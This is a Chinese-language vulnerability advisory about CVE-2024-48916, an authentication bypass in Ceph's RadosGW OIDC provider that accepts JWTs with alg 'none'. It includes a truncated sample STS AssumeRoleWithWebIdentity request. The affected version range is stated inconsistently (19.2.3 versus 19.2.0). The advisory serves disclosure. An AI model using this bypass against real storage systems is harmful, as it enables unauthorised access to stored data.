CEPH通过Radosgw身份验证旁路CVE-2024-48916
CEPH是一个统一分布式存储系统,旨在提供高性能、可靠性和可扩展性,平台支持三种主要的存储接口:对象存储、块存储和文件存储。
一、基本情况
CEPH是一个分布式对象、块和文件存储平台,设计初衷是提供较好的性能、可靠性和可扩展性,项目最早起源于Sage就读博士期间工作。
CEPH在统一系统中独特地提供对象、块和文件存储,高度可靠、易管理且免费,其强大功能改变公司IT基础架构和管理大量数据的能力。
栋科技漏洞库关注到CEPH存在容易通过Radosgw身份验证旁路的漏洞,漏洞现已被追踪为CVE-2024-48916,该漏洞的CVSS评分为9.1。
二、漏洞分析
CVE-2024-48916漏洞存在于RadosGW OIDC提供商中,19.2.3及以下版本可发送一个“无”的JWT作为JWT alg,这样不会检查JWT签名。
这一高危漏洞是在渗透测试中发现的,通过证明PoC中演示的JWT,可绕过CEPH-rados认证gw,因此在这种情况下,Keycloak用作IdP。
HTTP请求可以在下面找到。但如果没有JWT:
POST / HTTP/2
Host: storage.xxx.se
User-Agent: aws-sdk-go-v2/1.18.0 os/macos lang/go/1.21.1 X:nocoverageredesign md/GOOS/darwin md/GOARCH/arm64 api/sts/1.19.0
Content-Type: application/x-www-form-urlencoded
Amz-Sdk-Invocation-Id: 30a74697-7d7e-4c02-b041-97d68156ee78
Amz-Sdk-Request: attempt=1; max=3
Content-Length: 1508
Accept-Encoding: gzip, deflate, p
Action=AssumeRoleWithWebIdentity&DurationSeconds=3600&RoleArn=arn%3Aaws%3Aiam%3A%3Aorg_pentest002%3Arole%2Fu-pentest002STS&RoleSessionName=test&Version=2011-06-15&WebIdentityToken=ey..
三、影响范围
CEPH <= 19.2.0
四、修复建议
未知
五、参考链接
